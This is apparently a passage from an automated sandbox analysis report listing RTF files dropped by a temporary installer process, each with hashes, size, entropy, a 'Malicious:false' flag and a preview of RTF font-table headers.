                                                                                                                                                                                                                                                          SHA1:C661D3ECDB4B78DF45927CB9BD6AD3E97E32391B
                                                                                                                                                                                                                                                          SHA-256:FD87095AFDF8E11217CE15975B5072A0F9543F76E6969A1C89ABA454554D8DAE
                                                                                                                                                                                                                                                          SHA-512:6B54B1F73B15EB1EC8DA02C5ECB859A5E5ED10D41A04F667ACABCA35FA86684EC88D8AFE05C32BD84A1C8584CE6B0805A755FF36FB937484C4258D0CCE94D6E3
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):51302
                                                                                                                                                                                                                                                          Entropy (8bit):5.092103345877651
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:ss/LF89zHebIrmQBkyKWm+eCk4O6Cg2NjrOX/zJ0PfOyGlgOYBJiDBNBiOl/Vq/M:ssZdBa4zS
                                                                                                                                                                                                                                                          MD5:E5A9141385B035A9DA437DD1F1083F69
                                                                                                                                                                                                                                                          SHA1:A6959E190DCDAD51B46960285E8EFBE532648E7A
                                                                                                                                                                                                                                                          SHA-256:F5F01449E3735132C0A835E6F6A6E9810BF63592073AD66273F6DFEAE36EB41A
                                                                                                                                                                                                                                                          SHA-512:A7B6E252D2B28977A1C1699582BC66B40D99D4B18F47CA78BAFF8D5D0EED592FF6FD9E98E3C10658823A586244CA08A8EDD8A8B1B9B391881C7794E1F0C5EED6
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1033\deflangfe1033\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f40\fbidi \fswiss\fcharset0\fprq2{\*\panose 00000000000000000000}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43600
                                                                                                                                                                                                                                                          Entropy (8bit):5.089965856777119
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:s8SX8tS1BOd5rXmgamSN4UIRop4RiHAhzIaq4z4:s8cWRK4z4
                                                                                                                                                                                                                                                          MD5:A79752006AFB6D9A39FC512475ED8493
                                                                                                                                                                                                                                                          SHA1:41B4CD12ACE830E94F30119B35317B7C3C49DAEA
                                                                                                                                                                                                                                                          SHA-256:F0DEFD01327E90A5DCB72C78B1A1D0A875D39E43AC8CD1D2BB0E63B25465BADF
                                                                                                                                                                                                                                                          SHA-512:003CEED560F76521D0457BE2CCD3E438E7100765A6ECA110AE9EE47B43FA807DB389F1B1E1C3D001FC170B38E211E46A4D280799BEE93DA79237B9BD9B34F812
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1033\deflangfe1033\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):50648
                                                                                                                                                                                                                                                          Entropy (8bit):5.076966621667136
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:s8SW8t+CiBkyKWm+YqBjLW5qoqKZmbOTJbwQzgJetfBq4z+:s8f8Q4z+
                                                                                                                                                                                                                                                          MD5:927893BFF8C06F090F00A06389C24A42
                                                                                                                                                                                                                                                          SHA1:EADC77D6AAADC171CBF54B81A41930912803AAA0
                                                                                                                                                                                                                                                          SHA-256:37E18C594AA49F95B3CB800A7425EB6AD57FF8BAA97A523F971F8B9F77FC5F70
                                                                                                                                                                                                                                                          SHA-512:1DA7CA2795A54523DE39475A40832088924BFC49DD194A25E202C38D84F9A77389DEC2E612667C0D036ED911F3136D2D23D52AA43C6251D712E43C470E1031C7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1033\deflangfe1033\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):47686
                                                                                                                                                                                                                                                          Entropy (8bit):5.09343273407686
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:ssS88UAauxWSlSQ4KxTmlbyGwI+X0Ij+SN4UIRopfviHmdW0isCE35OAnelmHj/F:ss9Hq5F4zY
                                                                                                                                                                                                                                                          MD5:D883A50756AA633B20915B68BDCE5213
                                                                                                                                                                                                                                                          SHA1:B2B99E912B3F0D3E0DF2C90B71DE5C3316745E67
                                                                                                                                                                                                                                                          SHA-256:E41BEF0E6F6FCAB4CC5749CC8066F4AE4EA50F19C518B644B86034BC0885CB32
                                                                                                                                                                                                                                                          SHA-512:670BA488A0DEFF9B037CCCB22912798487F5FC02AFB84E9DF41E2D1DB98E39CF7BC608131B6D38DDAD8250E96F7A9900CCCFBEDA80512BBCBED055788DE8D72C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1033\deflangfe1033\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):53852
                                                                                                                                                                                                                                                          Entropy (8bit):5.077126010099254
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:s8SJmeIQTmoQBkyKWm+mqBjLW5qoISN4UIRop1BBAvqJ6Hcrfvw4QJuyHKj3z2yw:s8Urw4zS
                                                                                                                                                                                                                                                          MD5:23DB4F7C5A211C876D606B792A96769E
                                                                                                                                                                                                                                                          SHA1:5747AB46CEB3A87BD87CCB5723BF07E0CFBAA73B
                                                                                                                                                                                                                                                          SHA-256:6229BB6489019CA563DBF8F11CF135C4604A22014337F3AC3FF4E39FC3624E88
                                                                                                                                                                                                                                                          SHA-512:BFF0AAFAF0C676EB9CA6DCF5278E4796DF778943493826C8B3FE8475125C9ADDC4F5763BC64F12B62398C1B77343669BB518FD0A864E83A80CC9F3AACE519A0A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1033\deflangfe1033\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):61090
                                                                                                                                                                                                                                                          Entropy (8bit):5.061944824308056
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:s8/N3CelQcu09coHJreOBnAF3vlmgaJnAF3vlmgaiSN4UIRopZMggLBbWmb8Sw1w:s85g+X4zR
                                                                                                                                                                                                                                                          MD5:F233DF0C1E13DC0EC1FBC3DFE59E36FA
                                                                                                                                                                                                                                                          SHA1:A032C4D543AA03D01A28518894DD066D8682CE2C
                                                                                                                                                                                                                                                          SHA-256:B465F564E4A3FC70B8D12141C5CD4E1EA9C620D4B2A7A5DC84F54D8C5701F590
                                                                                                                                                                                                                                                          SHA-512:13CAF615E0EEEA67CD8037106E7714CACD72F4A74CB53561766D6D7546E97F62A390BB09FD5DFA3AAE56499E13CD699E13684181443E4361BECED33D8D6E26F9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1033\deflangfe1033\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):48225
                                                                                                                                                                                                                                                          Entropy (8bit):5.096715936522922
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:ss/Ly89zHebIrfVY9RtmIiRAN4UIRopxdRNudR5crHZi2drk7Y9mrjbmPObWPq6S:ssmpH84z8
                                                                                                                                                                                                                                                          MD5:2598048BFC64A464E54D6B415A7303E7
                                                                                                                                                                                                                                                          SHA1:6FD99F1B7BB146904F310EAA185C9BEF7794DB69
                                                                                                                                                                                                                                                          SHA-256:70C7A754C1EABFA6640D343B1CCF2F773DED987C88AC8F90331AC7DBD1B308AD
                                                                                                                                                                                                                                                          SHA-512:D50B166D6FD03868343EB90C549A7D0D6E6E72AB3A8C73A48E7FCB80AC17BD595BE237C7AEFEE47E1AE9BA80FA5C2DA9800F9A4562E7D99E7006EC89C626A2F7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1033\deflangfe1033\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f40\fbidi \fswiss\fcharset0\fprq2{\*\panose 00000000000000000000}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43013
                                                                                                                                                                                                                                                          Entropy (8bit):5.090193363439038
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:s8SX8t+yiBkyKWm+yqBjLW5qoFxbyl2Zweq4zX:s8cf4zX
                                                                                                                                                                                                                                                          MD5:2519F9520A2AB950F74212172A0BEB94
                                                                                                                                                                                                                                                          SHA1:BA0E1A1C41C867840AE63A677B053DA1118F886B
                                                                                                                                                                                                                                                          SHA-256:E1A9AD7ADB8F8E6969D8F8522118371971B6FE01CD6248819CEBEDBF2EAE9CB6
                                                                                                                                                                                                                                                          SHA-512:AA64B50E2570FFC247DB4D7D182F56A3C0010247AAC51D030AB554DA1A1B4D465CCEA6C50389610864E4B89E4381F575672D0A53018CE18483FAD26B021C1ECE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1033\deflangfe1033\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):47686
                                                                                                                                                                                                                                                          Entropy (8bit):5.09343273407686
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:ssS88UAauxWSlSQ4KxTmlbyGwI+X0Ij+SN4UIRopfviHmdW0isCE35OAnelmHj/F:ss9Hq5F4zY
                                                                                                                                                                                                                                                          MD5:D883A50756AA633B20915B68BDCE5213
                                                                                                                                                                                                                                                          SHA1:B2B99E912B3F0D3E0DF2C90B71DE5C3316745E67
                                                                                                                                                                                                                                                          SHA-256:E41BEF0E6F6FCAB4CC5749CC8066F4AE4EA50F19C518B644B86034BC0885CB32
                                                                                                                                                                                                                                                          SHA-512:670BA488A0DEFF9B037CCCB22912798487F5FC02AFB84E9DF41E2D1DB98E39CF7BC608131B6D38DDAD8250E96F7A9900CCCFBEDA80512BBCBED055788DE8D72C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1033\deflangfe1033\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):53852
                                                                                                                                                                                                                                                          Entropy (8bit):5.077126010099254
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:s8SJmeIQTmoQBkyKWm+mqBjLW5qoISN4UIRop1BBAvqJ6Hcrfvw4QJuyHKj3z2yw:s8Urw4zS
                                                                                                                                                                                                                                                          MD5:23DB4F7C5A211C876D606B792A96769E
                                                                                                                                                                                                                                                          SHA1:5747AB46CEB3A87BD87CCB5723BF07E0CFBAA73B
                                                                                                                                                                                                                                                          SHA-256:6229BB6489019CA563DBF8F11CF135C4604A22014337F3AC3FF4E39FC3624E88
                                                                                                                                                                                                                                                          SHA-512:BFF0AAFAF0C676EB9CA6DCF5278E4796DF778943493826C8B3FE8475125C9ADDC4F5763BC64F12B62398C1B77343669BB518FD0A864E83A80CC9F3AACE519A0A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1033\deflangfe1033\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):56628
                                                                                                                                                                                                                                                          Entropy (8bit):5.001958639036602
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:pqFk5evUwdvjLJzrrrMOcPI0QhhiLVptabQhOsWxkMvxGx5QZ+GjaorHye0HmuwB:pqnVUne8GjaUECaIA9o
                                                                                                                                                                                                                                                          MD5:BA9CD5C6FBC3F41BA7B21B842B211D29
                                                                                                                                                                                                                                                          SHA1:337DF42901DA8E9855D59333E4357BB3CF9953E2
                                                                                                                                                                                                                                                          SHA-256:CD14DD162DFBA323EB79D496DB0E9D053B9D21A8AB7E300232074458A91F62E4
                                                                                                                                                                                                                                                          SHA-512:D6A9DC42E548806E469BA0B15C40E886BE92EBBE247116FEE9E15EA83D6B3A8B19C42DF639405DBCB70B3E6859E243406CA24BBAEEAA57E95CCE26128D04ECD7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 0
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):67825
                                                                                                                                                                                                                                                          Entropy (8bit):4.9803843553687
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:pqeP2iXwdvjLJzrrrMOcPI0QhhiLVptabQhOsWxkMvxGx5QZTTHPmpncTUAF7s8a:pqL5UneNTHP3TIA9i
                                                                                                                                                                                                                                                          MD5:C84BB8D1E95FF5ED4B74B8F938B7C26F
                                                                                                                                                                                                                                                          SHA1:C661D3ECDB4B78DF45927CB9BD6AD3E97E32391B
                                                                                                                                                                                                                                                          SHA-256:FD87095AFDF8E11217CE15975B5072A0F9543F76E6969A1C89ABA454554D8DAE
                                                                                                                                                                                                                                                          SHA-512:6B54B1F73B15EB1EC8DA02C5ECB859A5E5ED10D41A04F667ACABCA35FA86684EC88D8AFE05C32BD84A1C8584CE6B0805A755FF36FB937484C4258D0CCE94D6E3
